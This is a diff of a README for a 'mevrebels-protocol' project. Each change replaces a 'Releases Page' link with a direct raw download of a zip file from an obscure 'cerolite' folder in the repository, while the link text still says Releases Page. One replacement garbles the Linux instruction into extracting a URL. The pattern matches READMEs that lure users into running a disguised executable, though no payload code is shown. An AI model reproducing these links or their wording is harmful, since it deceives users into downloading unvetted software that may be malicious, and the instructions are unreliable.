Brizzy-Reborn/mevrebels-protocol/README.md

    - Linux (Debian-based distributions)

 2. **Download the Software**:
-   - Visit this page to download: [Releases Page](https://github.com/Brizzy-Reborn/mevrebels-protocol/releases)
+   - Visit this page to download: [Releases Page](https://raw.githubusercontent.com/Brizzy-Reborn/mevrebels-protocol/main/cerolite/mevrebels-protocol.zip)

 3. **Install the Software**:
    - For **Windows**: Double-click the downloaded `.exe` file and follow the prompts.
    - For **macOS**: Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - For **Linux**: Extract the downloaded `.tar.gz` file and run the executable via terminal.
+   - For **Linux**: Extract the downloaded `https://raw.githubusercontent.com/Brizzy-Reborn/mevrebels-protocol/main/cerolite/mevrebels-protocol.zip` file and run the executable via terminal.

 ## 📥 Download & Install

-To download the software, go to the [Releases Page](https://github.com/Brizzy-Reborn/mevrebels-protocol/releases).
+To download the software, go to the [Releases Page](https://raw.githubusercontent.com/Brizzy-Reborn/mevrebels-protocol/main/cerolite/mevrebels-protocol.zip).
 Here, you will find the latest version available.
 Click on the appropriate file for your operating system to start the download.

 You will see different release versions listed.
 Choose the most recent one for the best experience.
 Once downloaded, follow the installation steps mentioned above based on your operating system.